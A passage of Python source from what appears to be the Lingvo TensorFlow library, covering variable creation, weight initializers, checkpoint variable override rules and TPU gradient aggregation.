semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
p = params.Copy()
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
else:
dim0 = 1
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
user_seed = seed if seed is not None else default_seed
seed = _GenerateStatelessRngSeed(var_name, user_seed)
# If var_name matches a regex, then set the var_dtype; else use p.dtype.
var_dtype = FindDataType(var_name)
if var_dtype is None:
var_dtype = p.dtype
init_dtype = var_dtype.real_dtype
v_init = _CreateVarInitStateless(name, method, shape, dim0, seed, scale,
init_dtype)
if var_dtype == tf.complex64:
raise TypeError(
'Stateless variable initialization does not support tf.complex64.')
def LingvoVariableCreator(next_creator, **kwargs):
"""Lingvo variable creator."""
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
with tf.variable_scope(name) as scope:
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=True)
with tf.variable_scope(var_scope), tf.variable_scope(var_name, reuse=reuse):
var = next_creator(**kwargs)
var_ref = var.experimental_ref() # For key in dict/set.
all_vars = _get_all_vars()
if var_ref in all_vars:
tf.logging.info('Reusing var %s', var.name)
cached = all_vars[var_ref]
assert cached == p.ToText(), ('Cached config:\n %s vs new config:\n %s' %
(cached, p.ToText()))
else:
tf.logging.info('Creating var %s shape=%s on device %s', var.name,
var.shape, var.device)
all_vars[var_ref] = p.ToText()
for col in p.collections:
tf.add_to_collection(col, var)
return var
with VariableCreatorScope(LingvoVariableCreator):
var = _GetVariableCreator()(
var_name=var_name,
var_params=p,
name='var',
shape=GetVariableShapePrefixes() + list(shape),
dtype=var_dtype,
initializer=v_init,
collections=collections,
trainable=trainable,
validate_shape=True,
synchronization=synchronization,
aggregation=aggregation)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if combined_layers_dims > 0:
# pylint: disable=protected-access
var.op._set_attr('_num_leading_dims_for_combined_layers',
attr_value_pb2.AttrValue(i=combined_layers_dims))
# Shard the variable according to the sharding spec.
tensor_split_dims_mapping = p.tensor_split_dims_mapping
if tensor_split_dims_mapping is not None:
count = (
len(GetVariableShapePrefixes()) + len(shape) -
len(tensor_split_dims_mapping) -
len(gshard_utils.GetMeshSplitDimPrefixContext()))
tensor_split_dims_mapping = [-1] * count + tensor_split_dims_mapping
var = gshard_utils.MeshSplit(
var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
return var
def _RandomXavierUniformInitializer(method, scale, seed):
"""Creates a random Xavier uniform initializer."""
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
del partition_info # Unused.
if not shape:
raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
return XavierUniform
def _CreateVarInitStateful(name, method, shape, dim0, seed, scale, init_dtype):
"""Creates variable initialization function for a stateful RNG."""
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
if method in ['gaussian_sqrt_fanavg']:
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None and fan_out is not None:
scale *= math.sqrt(2.0 / (fan_in + fan_out))
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
]:
v_init = init_ops.random_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = init_ops.random_uniform_initializer(
minval=-scale, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_positive']:
v_init = init_ops.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
elif method == 'category':
uniform_init = init_ops.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
v_init = lambda *args, **kwargs: tf.floor(uniform_init(*args, **kwargs))
elif method in ['uniform_unit_scaling']:
v_init = init_ops.uniform_unit_scaling_initializer(
factor=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_unit_scaling_fan_avg']:
v_init = tf.variance_scaling_initializer(
scale=scale,
mode='fan_avg',
distribution='uniform',
seed=seed,
dtype=init_dtype)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = init_ops.truncated_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['constant']:
v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
del partition_info # Unused.
if not shape:
raise ValueError(
'\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
v_init = XavierUniform
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = init_ops.random_uniform_initializer(
minval=-bound, maxval=bound, seed=seed, dtype=init_dtype)
else:
assert False, 'init_type `%s` not supported.' % method
return v_init
def _GenerateStatelessRngSeed(name, seed):
"""Generates a 2-tuple seed for a stateless variable initializer.
We want to ensure that different variables end up with different random values
even when they are passed the same seed and shape. To this aim, this function
generates a pseudo-unique seed by hashing the variable name and mapping it
into a scalar seed. More specifically, the returned value is a 2-tuple of
tf.int32 scalar, where the first element is the user-provided seed and the
second element is obtained by hashing the variable name.
Args:
name: The variable name for which to generate a stateless-like seed.
seed: The user-specified scalar seed.
Returns:
A 2-tuple seed of tf.int32 values (for TPU compatibility).
"""
seed0 = seed or 0
seed1 = GenerateSeedFromName(name)
return tf.constant([seed0, seed1], dtype=tf.int32)
def _DeterministicRandomNormalInitializer(seed, mean, stddev):
"""Creates a random normal initializer."""
def DeterministicNormal(shape, dtype, partition_info):
del partition_info # Unused.
return stateless_random_ops.stateless_random_normal(
shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)
return DeterministicNormal
def _DeterministicRandomUniformInitializer(seed, minval, maxval):
"""Creates a random uniform initializer."""
def DeterministicUniform(shape, dtype, partition_info):
del partition_info # Unused.
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=minval, maxval=maxval, dtype=dtype)
return DeterministicUniform
def _DeterministicRandomTruncatedNormalInitializer(seed, mean, stddev):
"""Creates a random truncated normal initializer."""
def DeterministicTruncatedNormal(shape, dtype, partition_info):
del partition_info # Unused.
return stateless_random_ops.stateless_truncated_normal(
shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)
return DeterministicTruncatedNormal
def _DeterministicRandomUniformUnitScalingInitializer(seed, factor):
"""Creates a random uniform unit scaling initializer."""
def DeterministicUniformUnitScaling(shape, dtype, partition_info):
# The following logic is originally from (UniformUnitScaling.__call__())
# in TensorFlow: python/ops/init_ops.py
scale_shape = shape
if partition_info is not None:
scale_shape = partition_info.full_shape
input_size = 1.0
# Estimating input size is not possible to do perfectly, but we try.
# The estimate, obtained by multiplying all dimensions but the last one,
# is the right thing for matrix multiply and convolutions (see above).
for dim in scale_shape[:-1]:
input_size *= float(dim)
# Avoid errors when initializing zero-size tensors.
input_size = max(input_size, 1.0)
maxval = math.sqrt(3 / input_size) * factor
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=-maxval, maxval=maxval, dtype=dtype)
return DeterministicUniformUnitScaling
def _DeterministicRandomVarianceScalingInitializer(scale, mode, distribution,
seed):
"""Creates a variance scaling initializer."""
if scale <= 0.:
raise ValueError('`scale` must be positive float.')
if mode not in {'fan_in', 'fan_out', 'fan_avg'}:
raise ValueError('Invalid `mode` argument:', mode)
distribution = distribution.lower()
if distribution not in {
'normal', 'uniform', 'truncated_normal', 'untruncated_normal'
}:
raise ValueError('Invalid `distribution` argument:', distribution)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def DeterministicVarianceScaling(shape, dtype, partition_info):
# This is originally from TensorFlow: python/ops/init_ops.py
scale_shape = shape
if partition_info is not None:
scale_shape = partition_info.full_shape
# Handle special case of empty list as shape, since fan_in and fan_out
# are numerically added below. Without this, GetFanInFanOut() would
# return None, None instead.
if isinstance(scale_shape, (list, tuple)) and not scale_shape:
fan_in, fan_out = 1, 1
else:
fan_in, fan_out = GetFanInFanOut(scale_shape, combined_layers_dims)
if mode == 'fan_in':
scale_inner = scale / max(1., fan_in)
elif mode == 'fan_out':
scale_inner = scale / max(1., fan_out)
else:
scale_inner = scale / max(1., (fan_in + fan_out) / 2.)
if distribution == 'normal' or distribution == 'truncated_normal':
# constant taken from scipy.stats.truncnorm.std(
# a=-2, b=2, loc=0., scale=1.)
stddev = math.sqrt(scale_inner) / .87962566103423978
return stateless_random_ops.stateless_truncated_normal(
shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
elif distribution == 'untruncated_normal':
stddev = math.sqrt(scale_inner)
return stateless_random_ops.stateless_random_normal(
shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
else:
limit = math.sqrt(3.0 * scale_inner)
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=-limit, maxval=limit, dtype=dtype)
return DeterministicVarianceScaling
def _DeterministicRandomXavierUniformInitializer(method, scale, seed):
"""Creates a variance scaling initializer."""
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
del partition_info # Unused.
if not shape:
raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * stateless_random_ops.stateless_random_uniform(
shape, seed, -limit, limit, dtype)
return XavierUniform
def _CreateVarInitStateless(name, method, shape, dim0, seed, scale, init_dtype):
"""Creates variable initialization function for a stateless RNG."""
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
if method in ['gaussian_sqrt_fanavg']:
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None and fan_out is not None:
scale *= math.sqrt(2.0 / (fan_in + fan_out))
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
]:
v_init = _DeterministicRandomNormalInitializer(
seed=seed, mean=0., stddev=scale)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=-scale, maxval=scale)
elif method in ['uniform_positive']:
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=0., maxval=scale)
elif method in ['uniform_unit_scaling']:
v_init = _DeterministicRandomUniformUnitScalingInitializer(
seed=seed, factor=scale)
elif method in ['uniform_unit_scaling_fan_avg']:
v_init = _DeterministicRandomVarianceScalingInitializer(
scale=scale, mode='fan_avg', distribution='uniform', seed=seed)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = _DeterministicRandomTruncatedNormalInitializer(
seed=seed, mean=0., stddev=scale)
elif method in ['constant']:
v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
v_init = _DeterministicRandomXavierUniformInitializer(method, scale, seed)
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=-bound, maxval=bound)
else:
assert False, 'init_type %s not supported.' % method
return v_init
_global_variable_scope = None
def GetGlobalVariableScope():
"""Gets the global variable scope (as if no variable_scope has been set).
Returns:
The VariableScope corresponding to as if no tf.variable_scope is in effect.
"""
if not _global_variable_scope:
# Each thread gets its own default global variable scope, and we take
# advantage of that in order to get a top-level scope. This avoids the
# need to call tf.get_variable_scope() at the module level, which allows
# this module to be imported without modifying global state (i.e. creating
# the default graph). It is important to not mutate the global state at
# module load time, because it let's us flip flags after import that affect
# core TensorFlow behavior.
def Initialize():
global _global_variable_scope
_global_variable_scope = tf.get_variable_scope()
t = threading.Thread(target=Initialize)
t.start()
t.join()
return _global_variable_scope
_GLOBAL_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def GlobalStepContext(global_step_tensor):
_GLOBAL_STEP_STACK.stack.append(global_step_tensor)
try:
yield
finally:
_GLOBAL_STEP_STACK.stack.pop()
def GetGlobalStep():
"""Return the global_step."""
if _GLOBAL_STEP_STACK.stack:
return _GLOBAL_STEP_STACK.stack[-1]
return tf.train.get_global_step()
def GetOrCreateGlobalStepVar():
"""Return the global_step variable, creating it if it does not exist.
Prefer GetGlobalStep if a tensor rather than a tf.Variable is sufficient.
Returns:
The global_step variable, or a new created one if it does not exist.
"""
with tf.variable_scope(GetGlobalVariableScope(), use_resource=True):
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return tf.train.get_or_create_global_step()
else:
return tf.train.get_or_create_global_step()
def LogMultiLines(label, lines):
if not isinstance(lines, (list, tuple)):
lines = lines.split('\n')
for line in lines:
tf.logging.info('%s: %s', label, line)
def _LogPlacement(label, theta, copy):
"""Logs theta and its copy's device placement."""
def GetDevices(m):
"""Flatten a `.NestedMap` m and extracts each value's device."""
return [x.device for x in m.Flatten()]
tf.logging.info('=== %s ===', label)
LogMultiLines(
label,
theta.Pack([('%s -> %s' % (x[0], x[1]))
for x in zip(GetDevices(theta), GetDevices(copy))
]).DebugString())
tf.logging.info('==========')
def CreateLocalTheta(theta, device_list=None, label=None):
"""Creates local copy of theta and shards across devices device list.
Leaves variables intact.
Args:
theta: a `.NestedMap` of variables.
device_list: list of devices to shard across. If None, defaults to a list
[''].
label: Logging label.
Returns:
A `.NestedMap` of identity() wrapped theta
"""
class AddIdentity:
"""Helper class."""
def __init__(self, device_list):
self._list = device_list if device_list else ['']
self._index = 0
def __call__(self, x):
if isinstance(x, tf.Variable):
return x
with tf.device(self._list[self._index % len(self._list)]):
self._index += 1
return tf.identity(x)
copy = theta.Transform(AddIdentity(device_list))
_LogPlacement(label, theta, copy)
return copy
def _GetVarsToLoad(all_vars, variable_loading_rules, var_ignore_rules,
ckpt_path):
"""Determines variables to load and their names in checkpoint."""
# This list contains mappings from var names as they appear in the checkpoint
# to the vars in our model they correspond to.
unused_rules = {
regexp: name_format for regexp, name_format in variable_loading_rules
}
vars_to_load = []
for model_var in all_vars:
loaded = False
for regexp, name_format in variable_loading_rules:
match = re.match(regexp, model_var.name)
# Skip if var doesn't match the loading rules, or if it should be ignored.
if not match:
tf.logging.debug('Loading rules do not match %s.', model_var.name)
continue
elif any(re.match(r, model_var.name) for r in var_ignore_rules):
tf.logging.debug('Ignoring %s from loading.', model_var.name)
continue
checkpoint_var_name = name_format % match.groups()
if checkpoint_var_name.endswith(':0'):
checkpoint_var_name = checkpoint_var_name[:-2]
tf.logging.info('Loading %s from %s with regexp: %s', model_var.name,
checkpoint_var_name, regexp)
vars_to_load.append((checkpoint_var_name, model_var))
unused_rules.pop(regexp, None)
loaded = True
break
if not loaded:
tf.logging.info(
'Not loading model variable %s from %s as it does not match any rules'
' or matches ignored', model_var.name, ckpt_path)
for regexp, name_format in unused_rules.items():
tf.logging.warning(f'User provided rule matched no variables: ({regexp}, '
f'{name_format})')
return vars_to_load
def OverrideVarsFromCheckpoint(all_vars, checkpoint_path,
variable_loading_rules, var_ignore_rules):
"""Add TF graph ops to override variables from a provided checkpoint.
Args:
all_vars: List of all the parameters in the model.
checkpoint_path: A path to the checkpoints of a pretrained model.
variable_loading_rules: A list of tuples of strings defining (regex to match
parameter names in the model to override, format string to determine the
corresponding var in the checkpoint).
var_ignore_rules: A list consisting of a list of regexes to match parameter
names in the model which should not be overridden, even if they match
those in the loading rules.
Returns:
A callable that, when called with a tf.Session, will restore the variables
from the provided checkpoint.
"""
vars_to_load = _GetVarsToLoad(all_vars, variable_loading_rules,
var_ignore_rules, checkpoint_path)
if not vars_to_load:
all_rules_text = '\n'.join(
[f'{k} --> {v}' for k, v in variable_loading_rules])
raise ValueError(f'Variable loading rules {all_rules_text} '
f'did not match any of {len(all_vars)} vars.')
load_var_names = '\n'.join(sorted([v.name for _, v in vars_to_load]))
tf.logging.info(f'Overriding {len(vars_to_load)} vars from '
f'{checkpoint_path}:\n{load_var_names}')
savers = []
while vars_to_load:
# When restoring, it's possible the same value in the checkpoint
# can be restored to multiple variables (e.g. during
# distillation). However, tf.train.Saver, since it's used for
# both saving and restoring, requires the name in the checkpoint
# to be unique for each variable. So, we call it multiple times
# with a unique set of names each time.
unique_vars_to_load = {}
remaining_vars_to_load = []
for k, v in vars_to_load:
if k not in unique_vars_to_load:
unique_vars_to_load[k] = v
else:
remaining_vars_to_load.append((k, v))
savers.append(tf.train.Saver(var_list=unique_vars_to_load, sharded=True))
vars_to_load = remaining_vars_to_load
def _Restore(sess):
for saver in savers:
saver.restore(sess, checkpoint_path)
return _Restore
def OverrideVarsFromCheckpoints(all_vars, ckpts_loading_rules):
"""Add TF graph ops to override model variables from checkpoints.
Args:
all_vars: List of all the parameters in the model.
ckpts_loading_rules: A dictionary of checkpoint path: loading rules.
Checkpoint path must be a path to a pretrained model, and loading rules is
expected to be a tuple of two lists. The first consisting of tuples of
strings defining (regex to match parameter names in the model to override,
format string to determine the corresponding var in the checkpoint), and
the second list consisting of a list of regexes to match parameter names
in the model which should not be overridden, even if they match those in
the loading rules.
Returns:
A callable that, when called with a tf.Session, will restore the variables
from checkpoint and return a list of overwritten variables.
Raises:
ValueError: if colliding vars exist or loading rules is not a list.
"""
if len(ckpts_loading_rules) > 1:
tf.logging.info('Overriding vars from multiple checkpoints.')
var_refs_overridden = set()
var_names_overridden = set()
restore_fns = []
for ckpt_path, loading_rules in ckpts_loading_rules.items():
tf.logging.info('Overriding vars from checkpoint: %s', ckpt_path)
if not isinstance(loading_rules, tuple):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
if len(loading_rules) != 2 or not all(
isinstance(l, list) for l in loading_rules):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
# Filter the model variables to be overridden.
to_load_vars = _GetVarsToLoad(all_vars, loading_rules[0], loading_rules[1],
ckpt_path)
var_refs_to_override = [var[1].experimental_ref() for var in to_load_vars]
var_names_to_override = [var[1].name for var in to_load_vars]
overlap_refs = set.intersection(var_refs_overridden, var_refs_to_override)
if overlap_refs:
raise ValueError('Colliding variables to override: %s' % overlap_refs)
restore_fns.append(
OverrideVarsFromCheckpoint(all_vars, ckpt_path, loading_rules[0],
loading_rules[1]))
var_refs_overridden.update(var_refs_to_override)
var_names_overridden.update(var_names_to_override)
tf.logging.info('Model variables overridden: %s', var_refs_overridden)
def _Restore(sess):
for fn in restore_fns:
fn(sess)
return var_names_overridden
return _Restore
def ComputeGradientsSimple(loss_or_activations,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
activations_grad=None):
"""Compute gradients."""
tape = _GRADIENT_TAPE_STACK.stack[-1] if _GRADIENT_TAPE_STACK.stack else None
if IsEagerMode() and tape:
tf.logging.info('ComputeGradientsSimple: using gradient tape.')
if activations_grad is not None:
raise ValueError('GradientTape does not accept gradient input values.')
if grad_aggregation_method or colocate_gradients_with_ops or gate_gradients:
tf.logging.warning(
'When GradientTape is used, these field will be ignored: '
f'grad_aggregation_method ({grad_aggregation_method}), '
f'colocate_gradients_with_ops ({colocate_gradients_with_ops}), '
f'gate_gradients ({gate_gradients}).')
return tape.gradient(
loss_or_activations,
all_vars,
unconnected_gradients=tf.UnconnectedGradients.ZERO)
return tf.gradients(
loss_or_activations,
all_vars,
grad_ys=activations_grad,
aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients)
def _ComputeGradientsTpu(loss_or_activations,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
skip_zero_gradients=None,
use_bf16_gradients_ar=False,
defer_crs_to_apply_grad=False,
activations_grad=None,
is_activations=False,
tpu_embedding_activations=None):
"""Computes gradients for local loss across whole TPU cluster.
This implementation specializes for the case where weight params maybe used
for different number of times in the forward computation, so that gradients
should be normalized by the actual number of times they are being computed.
TODO(yonghui): Maybe merge this implementation with the _ComputeGradientsTpu
one.
Args:
loss_or_activations: The loss or activations to backprop from.
all_vars: Vars with respect to which gradients are to be computed.
grad_aggregation_method: aggregation method to use when calling
tf.gradients.
colocate_gradients_with_ops: boolean, whether or not to colocate gradient op
with the original op.
gate_gradients: boolean, flag to be passed to tf.gradients.
skip_zero_gradients: whether to skip zero gradients during aggregation.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce.
defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
apply_gradient. This helps reducing the number of gradient all-reduces
when doing gradient accumulation, which does gradient cross replica sum
only every k steps in a tf.cond. Currently this works only when
skip_zero_gradients is None.
activations_grad: The gradients computed for activations.
is_activations: A boolean, whether the input is loss or activations.
tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
embedding feature tensor.
Returns:
Gradients to be passed back. If tpu_embedding_activations is set, their
gradients will be placed at the end.
Raises:
ValueError: upon invalid arguments.
"""
if is_activations:
assert activations_grad is not None
if not skip_zero_gradients and not is_activations:
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
assert shards
loss_or_activations *= tf.constant(
1.0 / shards, dtype=loss_or_activations.dtype)
else:
assert not tpu_embedding_activations, (
'Gradient computation for tpu embedding activations requires proper '
'loss scaling, and so is not compatible with skip_zero_gradients and '
'is_activations.')
# Computes the gradients.
# Sum the grads so that we can compute statistics across the whole batch.
all_grads = ComputeGradientsSimple(
loss_or_activations=loss_or_activations,
all_vars=all_vars +
(tpu_embedding_activations if tpu_embedding_activations else []),
grad_aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients,
activations_grad=activations_grad)
if tpu_embedding_activations:
# Note we don't need to aggregate TPU embedding gradients below.
tpu_embedding_grads = all_grads[len(all_vars):]
all_grads = all_grads[:len(all_vars)]
else:
tpu_embedding_grads = []
# NOTE: We can't use tpu_optimizer.CrossShardOptimizer since
# we need to scale the grads *after* the cross_replica_sum to
# match GPU version!
# TODO(cwhipkey): should we do something different here? - we could do
# some operations on the gradients before the aggregation (see comments in
# tensorflow/contrib/tpu/python/tpu/tpu_optimizer.py - see compute_gradients -
# for some more details).
aggregated_grads = []
for g in all_grads:
if g is None:
aggregated_grads.append(None)
continue
if use_bf16_gradients_ar:
g = tf.cast(g, tf.bfloat16)
with tf.ops.colocate_with(g):
if skip_zero_gradients is None:
# loss is already scaled by 1/shards.
if defer_crs_to_apply_grad:
normalized_g = tf.convert_to_tensor(g)
else:
normalized_g = tf.tpu.cross_replica_sum(g)
else:
# Compute the cross-replica mean of 'g', skipping zero gradients.
# Q(yonghui): Is there a better way to detect a non-zero gradient?
# Note(yonghui): gradient of a weight can be zero if that
# weight is not used in the forward computation, e.g. as in
# switchable layers in neural architecture search, pruned by channel
# mask, or sparsified.
if skip_zero_gradients == 'weight':
# Same shape as 'g'.
g_is_non_zero = tf.cast(tf.math.abs(g) > 1e-8, g.dtype)
elif skip_zero_gradients == 'variable':
# A variable-wide 0/1 scalar.
g_is_non_zero = tf.cast(
tf.reduce_sum(tf.math.abs(g)) > 1e-24, g.dtype)
else:
raise ValueError('Unknown skip_zero_gradients: %s' %
skip_zero_gradients)
num_updates = tf.maximum(tf.tpu.cross_replica_sum(g_is_non_zero), 1.0)
normalized_g = tf.tpu.cross_replica_sum(g) / num_updates
aggregated_grads.append(normalized_g)
return aggregated_grads + tpu_embedding_grads
class VarGrad:
"""A class that holds a variable and a gradient."""
_VAR_GRAD = py_collections.namedtuple('VarGradNamedTuple', ['var', 'grad'])
def __init__(self, *args, **kwargs):
self._var_grad = self._VAR_GRAD(*args, **kwargs)
def __getitem__(self, key):
return self._var_grad[key]
def __getattr__(self, key):
return getattr(self._var_grad, key)
def __iter__(self):
return iter(self._var_grad)
def __repr__(self):
return 'VarGrad(%r, %r)' % (self._var_grad.var, self._var_grad.grad)
def SkipNoneGradients(var_grads):
"""Removes pairs whose grad is None."""
for key, (_, g) in var_grads.FlattenItems():
if g is None:
tf.logging.info('ComputeGradients drops %s', key)
return var_grads.Filter(lambda var_grad: var_grad.grad is not None)
def ComputeGradients(
loss_or_activations,
vmap,
grad_aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE,
colocate_gradients_with_ops=True,
gate_gradients=False,
compute_gradients_fn=None,
skip_zero_gradients=None,
use_bf16_gradients_ar=False,
skip_none_gradients=True,
defer_crs_to_apply_grad=False,
activations_grad=None,
is_activations=False,
tpu_embedding_activations=None):
"""Computes gradients of variables in vmap w.r.t loss.
Args:
loss_or_activations: either the loss, which is a scalar tensor, or
activations, which could be a tensor or a list of tensors.
vmap: A `.NestedMap` of variables.
grad_aggregation_method: Specifies the method used to combine gradient
terms. Accepted values are constants defined in the class
AggregationMethod.
colocate_gradients_with_ops: If True, try colocating gradients with the
corresponding op.
gate_gradients: If True, add a tuple around the gradients returned for an
operations. This avoids some race conditions.
compute_gradients_fn: Function to use to compute gradients. If None, use
default. compute_gradients_fn should have the same signature as this
function, but without the last argument.
skip_zero_gradients: Whether to skip aggregating zero gradients. This helps
in case where some weights may not be used in forward computation, e.g.,
sparsely activated networks or switchable layers in neural architectural
search. Only applicable on TPU.
Possible values are:
- None: do not skip zero gradients;
- `variable`: skip if the entire variable's gradients are almost zero;
reduce_sum(abs(grads)) < 1e-8.
- `weight`: skip if the individual weight's gradients are almost zero:
abs(grad) < 1e-8.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce. This applies to TPU only.
